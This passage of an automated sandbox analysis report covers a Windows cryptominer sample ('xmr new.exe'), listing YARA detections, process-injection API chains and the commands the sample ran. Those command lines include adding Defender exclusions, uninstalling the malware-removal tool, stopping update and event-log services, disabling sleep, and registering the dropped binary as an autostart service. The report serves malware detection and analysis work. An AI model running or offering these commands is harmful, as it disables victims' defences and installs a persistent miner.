        Source: lsass.exe, 00000025.00000002.2799238553.000002A29123E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1536010223.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2800180911.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535837894.000002A29123E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
        Source: lsass.exe, 00000025.00000000.1536010223.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000000.1535899113.000002A2912D9000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2800180911.000002A291385000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000025.00000002.2799573161.000002A2912D9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: lsass.exe, 00000025.00000000.1535837894.000002A29123E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07

        System Summary

        Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
        Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: Detects coinmining malware Author: ditekSHen
        Source: 00000042.00000002.2793385319.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Windows\System32\dialer.exe Code function: 25_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 25_2_00000001400010C0
        Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BC28C8 NtEnumerateValueKey,NtEnumerateValueKey, 31_2_000001F385BC28C8
        Source: C:\Windows\System32\lsass.exe Code function: 37_2_000002A29199202C NtQuerySystemInformation,StrCmpNIW, 37_2_000002A29199202C
        Source: C:\Windows\System32\lsass.exe Code function: 37_2_000002A29199253C NtQueryDirectoryFileEx,GetFileType,StrCpyW, 37_2_000002A29199253C
        Source: C:\Windows\System32\dwm.exe Code function: 42_2_00000283E0F528C8 NtEnumerateValueKey,NtEnumerateValueKey, 42_2_00000283E0F528C8
        Source: C:\Windows\System32\dialer.exe Code function: 63_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle, 63_2_00000001400010C0
        Source: C:\Windows\System32\dialer.exe Code function: 65_2_0000000140001394 NtOpenKeyTransactedEx, 65_2_0000000140001394
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe File created: C:\Windows\TEMP\zhgmaxoaawxc.sys
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: C:\Windows\Temp\__PSScriptPolicyTest_ctadsvif.1ug.ps1
        Source: C:\Windows\System32\dialer.exe Code function: 25_2_000000014000226C 25_2_000000014000226C
        Source: C:\Windows\System32\dialer.exe Code function: 25_2_00000001400014D8 25_2_00000001400014D8
        Source: C:\Windows\System32\dialer.exe Code function: 25_2_0000000140002560 25_2_0000000140002560
        Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BA38A8 31_2_000001F385BA38A8
        Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385B9D0E0 31_2_000001F385B9D0E0
        Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385B91F2C 31_2_000001F385B91F2C
        Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BD44A8 31_2_000001F385BD44A8
        Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BCDCE0 31_2_000001F385BCDCE0
        Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BC2B2C 31_2_000001F385BC2B2C
        Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BFD0E0 31_2_000001F385BFD0E0
        Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385C038A8 31_2_000001F385C038A8
        Source: C:\Windows\System32\winlogon.exe Code function: 31_2_000001F385BF1F2C 31_2_000001F385BF1F2C
        Source: C:\Windows\System32\lsass.exe Code function: 37_2_000002A2911C1F2C 37_2_000002A2911C1F2C
        Source: C:\Windows\System32\lsass.exe Code function: 37_2_000002A2911D38A8 37_2_000002A2911D38A8
        Source: C:\Windows\System32\lsass.exe Code function: 37_2_000002A2911CD0E0 37_2_000002A2911CD0E0
        Source: C:\Windows\System32\lsass.exe Code function: 37_2_000002A291992B2C 37_2_000002A291992B2C
        Source: C:\Windows\System32\lsass.exe Code function: 37_2_000002A2919A44A8 37_2_000002A2919A44A8
        Source: C:\Windows\System32\lsass.exe Code function: 37_2_000002A29199DCE0 37_2_000002A29199DCE0
        Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E255DD0E0 40_2_0000014E255DD0E0
        Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E255E38A8 40_2_0000014E255E38A8
        Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E255D1F2C 40_2_0000014E255D1F2C
        Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E25EDDCE0 40_2_0000014E25EDDCE0
        Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E25EE44A8 40_2_0000014E25EE44A8
        Source: C:\Windows\System32\svchost.exe Code function: 40_2_0000014E25ED2B2C 40_2_0000014E25ED2B2C
        Source: C:\Windows\System32\dwm.exe Code function: 42_2_00000283E0F21F2C 42_2_00000283E0F21F2C
        Source: C:\Windows\System32\dwm.exe Code function: 42_2_00000283E0F2D0E0 42_2_00000283E0F2D0E0
        Source: C:\Windows\System32\dwm.exe Code function: 42_2_00000283E0F338A8 42_2_00000283E0F338A8
        Source: C:\Windows\System32\dwm.exe Code function: 42_2_00000283E0F52B2C 42_2_00000283E0F52B2C
        Source: C:\Windows\System32\dwm.exe Code function: 42_2_00000283E0F5DCE0 42_2_00000283E0F5DCE0
        Source: C:\Windows\System32\dwm.exe Code function: 42_2_00000283E0F644A8 42_2_00000283E0F644A8
        Source: C:\Windows\System32\dialer.exe Code function: 63_2_000000014000226C 63_2_000000014000226C
        Source: C:\Windows\System32\dialer.exe Code function: 63_2_00000001400014D8 63_2_00000001400014D8
        Source: C:\Windows\System32\dialer.exe Code function: 63_2_0000000140002560 63_2_0000000140002560
        Source: C:\Windows\System32\dialer.exe Code function: 65_2_0000000140003240 65_2_0000000140003240
        Source: C:\Windows\System32\dialer.exe Code function: 65_2_00000001400027D0 65_2_00000001400027D0
        Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001FB539A38A8 67_2_000001FB539A38A8
        Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001FB5399D0E0 67_2_000001FB5399D0E0
        Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001FB53991F2C 67_2_000001FB53991F2C
        Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001FB539D44A8 67_2_000001FB539D44A8
        Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001FB539CDCE0 67_2_000001FB539CDCE0
        Source: C:\Windows\System32\svchost.exe Code function: 67_2_000001FB539C2B2C 67_2_000001FB539C2B2C
        Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CBD8BB38A8 68_2_000001CBD8BB38A8
        Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CBD8BAD0E0 68_2_000001CBD8BAD0E0
        Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CBD8BA1F2C 68_2_000001CBD8BA1F2C
        Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CBD8BE44A8 68_2_000001CBD8BE44A8
        Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CBD8BDDCE0 68_2_000001CBD8BDDCE0
        Source: C:\Windows\System32\svchost.exe Code function: 68_2_000001CBD8BD2B2C 68_2_000001CBD8BD2B2C
        Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001F2BD13D0E0 69_2_000001F2BD13D0E0
        Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001F2BD1438A8 69_2_000001F2BD1438A8
        Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001F2BD131F2C 69_2_000001F2BD131F2C
        Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001F2BD16DCE0 69_2_000001F2BD16DCE0
        Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001F2BD1744A8 69_2_000001F2BD1744A8
        Source: C:\Windows\System32\svchost.exe Code function: 69_2_000001F2BD162B2C 69_2_000001F2BD162B2C
        Source: Joe Sandbox View Dropped File: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe D7CD81563E5B98B9A329286557DE71186D3F8F364A46691ACA253CA00E4C3EF2
        Source: Joe Sandbox View Dropped File: C:\Windows\Temp\zhgmaxoaawxc.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
        Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
        Source: 66.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
        Source: 00000042.00000002.2793385319.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
        Source: classification engine Classification label: mal100.spyw.evad.mine.winEXE@90/12@4/1
        Source: C:\Windows\System32\dialer.exe Code function: 25_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx, 25_2_000000014000226C
        Source: C:\Windows\System32\dialer.exe Code function: 63_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx, 63_2_000000014000226C
        Source: C:\Windows\System32\dialer.exe Code function: 25_2_00000001400019C4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString, 25_2_00000001400019C4
        Source: C:\Windows\System32\dialer.exe Code function: 25_2_000000014000226C GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx, 25_2_000000014000226C
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4992:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3184:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:2292:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4380:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2192:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3128:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1868:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3124:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6196:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3668:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5696:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1820:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1096:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1404:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1080:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:3108:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4436:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2572:120:WilError_03
        Source: C:\Windows\System32\dialer.exe Mutant created: \BaseNamedObjects\Global\fmfuvuvubhulhbmi
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5508:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5652:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:4316:120:WilError_03
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4980:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkd1lcwd.bin.ps1
        Source: xmr new.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\dialer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\System32\dialer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Windows\System32\dialer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
        Source: C:\Users\user\Desktop\xmr new.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: xmr new.exe ReversingLabs: Detection: 73%
        Source: C:\Users\user\Desktop\xmr new.exe File read: C:\Users\user\Desktop\xmr new.exe
        Source: unknown Process created: C:\Users\user\Desktop\xmr new.exe "C:\Users\user\Desktop\xmr new.exe"
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
        Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
        Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
        Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
        Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
        Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CKTJZLMO"
        Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
        Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"
        Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown Process created: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
        Source: C:\Windows\System32\sc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
        Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
        Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
        Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\dialer.exe dialer.exe
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exe
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "CKTJZLMO"
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "CKTJZLMO" binpath= "C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe" start= "auto"
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
        Source: C:\Users\user\Desktop\xmr new.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "CKTJZLMO"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\ProgramData\wwuujrlkomwy\eejhedztifcv.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
